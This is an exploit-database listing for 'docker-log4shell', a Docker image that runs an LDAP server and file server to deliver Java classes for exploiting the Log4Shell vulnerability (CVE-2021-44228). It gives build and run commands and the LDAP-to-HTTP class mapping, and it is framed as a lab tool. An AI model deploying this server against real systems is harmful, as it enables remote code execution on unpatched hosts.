Exploit for Deserialization of Untrusted Data in Apache Log4J

Name: Exploit for Deserialization of Untrusted Data in Apache Log4J
Rating: 5 (181 reviews)

2021-12-12 | CVSS 8.8

## https://sploitus.com/exploit?id=0E43C674-363B-53C2-8686-6F412A995AF4
# docker-log4shell

Simple Go app / Docker image for playing with the [CVE-2021-44228](https://vulners.com/cve/CVE-2021-44228) vulnerability. Hosts a simple file server and an ldap server that provides any classes hosted in the file server: `ldap://ip:1389/Hello -> http://ip:8080/Hello.class`

```
docker build -t log4shell .
docker run -it -v "path-to-classes:/files" -p 1389:1389 -p 8080:8080 -e HOST=localhost log4shell
```